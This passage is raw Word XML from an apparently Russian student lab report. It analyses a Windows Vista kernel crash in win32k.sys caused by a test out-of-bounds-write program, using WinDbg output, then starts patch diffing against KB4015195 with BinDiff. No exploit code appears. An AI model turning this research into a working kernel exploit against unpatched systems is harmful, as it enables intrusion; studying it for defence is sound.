        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidR="00694023">
        <w:t xml:space="preserve"> (Рисунок 3)</w:t>
      </w:r>
      <w:r w:rsidR="00A17FC6" w:rsidRPr="00A17FC6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D6535" w14:textId="6DBC2D86" w:rsidR="001B764C" w:rsidRDefault="00AF7614" w:rsidP="00696013">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF7614">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="672B5EAB" wp14:editId="6DC79939">
            <wp:extent cx="5940425" cy="4451350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Рисунок 1" descr="Изображение выглядит как текст, электроника,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электроника, снимок экрана, компьютер&#10;&#10;Автоматически созданное описание"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="4451350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E393CF" w14:textId="64B8D8CB" w:rsidR="00E917F4" w:rsidRDefault="00E917F4" w:rsidP="00E917F4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidR="00AF7614">
        <w:t>Результат работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261DE42" w14:textId="5E7A8C3E" w:rsidR="00AF7614" w:rsidRDefault="00694023" w:rsidP="00AF7614">
      <w:r>
        <w:t>Проанализируем сообщения отладчика.</w:t>
      </w:r>
      <w:r w:rsidR="003652D4">
        <w:t xml:space="preserve"> На Рисунке 4 в последних двух строках видно, что с системой что-то случилось.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34077E4D" w14:textId="299F6C71" w:rsidR="007D412B" w:rsidRDefault="003652D4" w:rsidP="007D412B">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="003652D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="640FEFAF" wp14:editId="71B6D56E">
            <wp:extent cx="5940425" cy="1814830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="1814830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7401C8" w14:textId="3260F874" w:rsidR="000A4A35" w:rsidRDefault="000A4A35" w:rsidP="000A4A35">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidR="003652D4">
        <w:t>Сообщения отладчика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D283BDA" w14:textId="163F7491" w:rsidR="003652D4" w:rsidRPr="003652D4" w:rsidRDefault="003652D4" w:rsidP="003652D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запросим анализ командой </w:t>
      </w:r>
      <w:r w:rsidRPr="003652D4">
        <w:t>kd&gt; !analyze -v</w:t>
      </w:r>
      <w:r>
        <w:t>. После загрузки символов получим следующую информацию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E96DA8F"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Unknown bugcheck code (0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B9450"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Unknown bugcheck description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A859E46"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Arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5315BBC5"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Arg1: 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D15454"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lastRenderedPageBreak/>
        <w:t>Arg2: 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CD33D"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Arg3: 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6091E4"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Arg4: 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C9C3A6"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41639FD4"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Debugging Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F770D8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610FE3ED"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KEY_VALUES_STRING: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A7DA42"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776CE3AD"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AV.Fault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27674B8D"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Write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA22AF"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25A171D6"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Analysis.CPU.mSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D98E58D"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5718</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAB1EA7"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18C3AAA3"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Analysis.DebugAnalysisManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2575EB02"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Create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C5839E"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2F5720B6"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Analysis.Elapsed.mSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8EB791"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28981</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A24FA29"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079DD17D"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Analysis.Init.CPU.mSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A4CAD"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5874</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADC5F65"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4344514D"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Analysis.Init.Elapsed.mSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFC5E0"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216932</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F86E01E"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3450AC27"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Analysis.Memory.CommitPeak.Mb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E91210"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99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966A4A3"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61C6DD3A"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Bugcheck.Code.DumpHeader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2521D602"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0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BDFB3"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2E6188C1"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Bugcheck.Code.KiBugCheckData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC82CD3"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0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C9D41"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31D9912B"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WER.OS.Branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2EE33"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lh_sp2rtm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F98CA42"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63941480"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WER.OS.Timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E37121"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2009-04-10T18:30:00Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77D7C8"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529DD07F"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Key  : WER.OS.Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5484DC"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Value: 0.0.6002.18005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4479B4E7"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700BB894"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BUGCHECK_CODE:  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2EDF3"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BUGCHECK_P1: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE4F6D"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BUGCHECK_P2: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38456ACA"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BUGCHECK_P3: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645556CA"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BUGCHECK_P4: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AC2DC5"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PROCESS_NAME:  usermode_oob_write.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD84CE6"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WRITE_ADDRESS: Target machine operating system not supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B19E7"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00061000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C1519"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ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263CA8A"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EXCEPTION_CODE_STR:  c0000005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB65D7"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EXCEPTION_PARAMETER1:  00000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A738A"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EXCEPTION_PARAMETER2:  00061000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F4947"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725B01F4"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STACK_TEXT:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2866F3B0"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91ae0bc0 8ef223c6     fdeb2f65 ff060ffc 00000064 win32k!EncodeRLE8+0x1ab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F7F22"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lastRenderedPageBreak/>
        <w:t>91ae0cac 8ef2e57a     00000001 fdeb1008 00000000 win32k!GreGetDIBitsInternal+0x88e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DCE6CF"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91ae0d38 81884c7a     30010c23 5e050b28 00000000 win32k!NtGdiGetDIBitsInternal+0x250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F7A87"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&lt;Intermediate frames may have been skipped due to lack of complete unwind&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755C5306"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91ae0d38 00ac100b (T) 30010c23 5e050b28 00000000 nt!KiFastCallEntry+0x12a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA000B"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    &lt;Intermediate frames may have been skipped due to lack of complete unwind&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910915E"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002ef948 00ac116e (T) 000010b3 30010c23 5e050b28 usermode_oob_write!SystemCall32+0xb [C:\Users\heath\Desktop\óíèâåð\6 ñåì (õî÷åòñÿ â àêàäåì)\ìáêñ\4\usermode_oob_write.cpp @ 10] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA5A83A"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002ef9c8 00ac1543     00000001 00101750 001017b8 usermode_oob_write!main+0x14e [C:\Users\heath\Desktop\óíèâåð\6 ñåì (õî÷åòñÿ â àêàäåì)\ìáêñ\4\usermode_oob_write.cpp @ 49] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D33942F"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002ef9e8 00ac1417     dc638b4d 00000000 00000000 usermode_oob_write!invoke_main+0x33 [D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl @ 78] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8A41F"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002efa44 00ac12bd     002efa54 00ac15a8 002efa60 usermode_oob_write!__scrt_common_main_seh+0x157 [D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl @ 288] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624CF2F4"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002efa4c 00ac15a8     002efa60 7743d0e9 7ffd3000 usermode_oob_write!__scrt_common_main+0xd [D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl @ 331] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D117599"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002efa54 7743d0e9     7ffd3000 002efaa0 775119bb usermode_oob_write!mainCRTStartup+0x8 [D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_main.cpp @ 17] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D94B31"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002efa60 775119bb     7ffd3000 7721ebbf 00000000 kernel32!BaseThreadInitThunk+0xe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6826841E"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002efaa0 7751198e     00ac15a0 7ffd3000 00000000 ntdll!__RtlUserThreadStart+0x23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A773A1"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002efab8 00000000     00ac15a0 7ffd3000 00000000 ntdll!_RtlUserThreadStart+0x1b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B9D36"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p>
    <w:p w14:paraId="20E2FC88"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SYMBOL_NAME:  win32k!EncodeRLE8+1ab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4960706B"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0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003652D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MODULE_NAME: </w:t>
      </w:r>
      <w:r w:rsidRPr="003652D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win32k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F5F01"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IMAGE_NAME:  win32k.sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED98FB2"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IMAGE_VERSION:  6.0.6002.18005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442ABD54"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STACK_COMMAND:  .cxr; .ecxr ; kb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E6F485"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FAILURE_BUCKET_ID:  ACCESS_VIOLATION_win32k!EncodeRLE8+1ab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324733A2"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OS_VERSION:  0.0.6002.18005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F851EE9"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BUILDLAB_STR:  lh_sp2rtm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669BDE00"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OSPLATFORM_TYPE:  x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF67F3"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OSNAME:  Windows Vista</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09759E" w14:textId="77777777" w:rsidR="003652D4" w:rsidRPr="003652D4"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003652D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FAILURE_ID_HASH:  {1328338c-4a0a-795b-16f2-0d4102aad664}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BD8B8" w14:textId="77777777" w:rsidR="003652D4" w:rsidRPr="0075529D"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color w:val="1E1E1E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA31B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Followup</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">:     </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MachineOwner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F65C464" w14:textId="77777777" w:rsidR="003652D4" w:rsidRPr="0075529D" w:rsidRDefault="003652D4" w:rsidP="00365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nsolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>---------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EFF9F" w14:textId="77777777" w:rsidR="00FA31B8" w:rsidRDefault="00FA31B8" w:rsidP="003652D4">
      <w:r>
        <w:t>Как</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>видно</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">падение вызвал именно модуль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, его и предстоит исследовать. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D007411" w14:textId="612BAA2C" w:rsidR="00FA31B8" w:rsidRDefault="00FA31B8" w:rsidP="00FA31B8">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Исследование исправлений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E4A45" w14:textId="0950D890" w:rsidR="003F1F44" w:rsidRPr="0075529D" w:rsidRDefault="00FA31B8" w:rsidP="003F1F44">
      <w:r>
        <w:t xml:space="preserve">Извлечём данный файл из уязвимой версии ОС, а также из патча исправления </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kb</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t>4015195</w:t>
      </w:r>
      <w:r w:rsidR="001F0AAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F0AAB" w:rsidRPr="001F0AAB">
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t>. DIFFER</w:t>
      </w:r>
      <w:r w:rsidR="001F0AAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t>— это программа, которая из двух последовательных версий одного и того же файла, пытается найти различия в функциях и пытается показать</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="003F1F44">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t xml:space="preserve"> какие функции были изменены и где</w:t>
      </w:r>
      <w:r w:rsidR="001F0AAB" w:rsidRPr="001F0AAB">
        <w:t xml:space="preserve"> [4</w:t>
      </w:r>
      <w:r w:rsidR="001F0AAB" w:rsidRPr="000C3060">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA31B8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="003F1F44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:t>Ч</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="00FA31B8">
        <w:t>ем больше было изменений в исполняемом файле, т</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:t>ем</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="00FA31B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:t>сложнее анализ</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="00FA31B8">
        <w:t>, так</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="00FA31B8">
        <w:t>как</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:t xml:space="preserve"> дифер </w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="00FA31B8">
        <w:t>совершает некоторые ошибки при сравнении.</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:t xml:space="preserve"> На сегодняшний день </w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">наилучшим дифером является </w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BinDiff</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="003F1F44">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:t xml:space="preserve"> Для его установки необходимо иметь </w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44" w:rsidRPr="003F1F44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r w:rsidR="003F1F44">
        <w:t>, в которую дифер встраивается в качестве плагина.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF08731" w14:textId="2261F02B" w:rsidR="00A33C0B" w:rsidRPr="007265A7" w:rsidRDefault="00A33C0B" w:rsidP="003F1F44">
      <w:r>
        <w:t>После выполнения плагином поиска различий появляются дополнительные окна с информацией о данных различиях</w:t>
      </w:r>
      <w:r w:rsidR="007265A7">
        <w:t xml:space="preserve"> (Рисунок 5). Параметр </w:t>
      </w:r>
      <w:r w:rsidR="007265A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Similarity</w:t>
      </w:r>
      <w:r w:rsidR="007265A7" w:rsidRPr="007265A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007265A7">
        <w:t>сообщает, насколько функции похожи друг на друга. При значении 1.0 они полностью идентичны. Чем ближе этот показатель к нулю, тем больше различий в сравниваемых версиях. При анализе оказалось, что достаточно много функций претерпели изменения, от мелких исправлений до практически полного переписывания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C2CDC" w14:textId="7368C343" w:rsidR="005A5E62" w:rsidRDefault="007265A7" w:rsidP="005A5E62">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="007265A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4780C71B" wp14:editId="28F04563">
            <wp:extent cx="5940425" cy="2227580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Рисунок 6"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стол&#10;&#10;Автоматически созданное описание"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="2227580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007265A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1517DEC6" wp14:editId="62BDE3C5">
            <wp:extent cx="5940425" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Рисунок 7"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стол&#10;&#10;Автоматически созданное описание"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="13989"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C0B1F0" w14:textId="5AEC7551" w:rsidR="005A5E62" w:rsidRDefault="005A5E62" w:rsidP="005A5E62">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidR="007265A7">
        <w:t>Сравнение уязвимого файла с патчем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51844BA3" w14:textId="0D1B3A8C" w:rsidR="00FF137D" w:rsidRPr="00FF137D" w:rsidRDefault="00CE67BD" w:rsidP="00FF137D">
      <w:r>
        <w:t>Утилита также предоставляет возможность просмотра изменений в виде графа. На Рисунк</w:t>
      </w:r>
      <w:r w:rsidR="000F0A10">
        <w:t>ах</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6 и 7 представлены графы для функций с показателем похожести 0.</w:t>
      </w:r>
      <w:r w:rsidR="000F0A10">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000F0A10">
        <w:t xml:space="preserve">. К изменениям относятся как переписывание части кода блока, так и добавление новых блоков. В данном случае из 4 </w:t>
      </w:r>
      <w:r w:rsidR="000F0A10">
        <w:lastRenderedPageBreak/>
        <w:t>блоков стало 16. Поскольку в качестве блоков выступают условия, можно говорить о добавлении дополнительных проверок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CECE54F" w14:textId="27E9E3F8" w:rsidR="000A4A35" w:rsidRDefault="00CE67BD" w:rsidP="00FF137D">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE67BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52DB6368" wp14:editId="30D837A5">
            <wp:extent cx="5940425" cy="3429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29000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
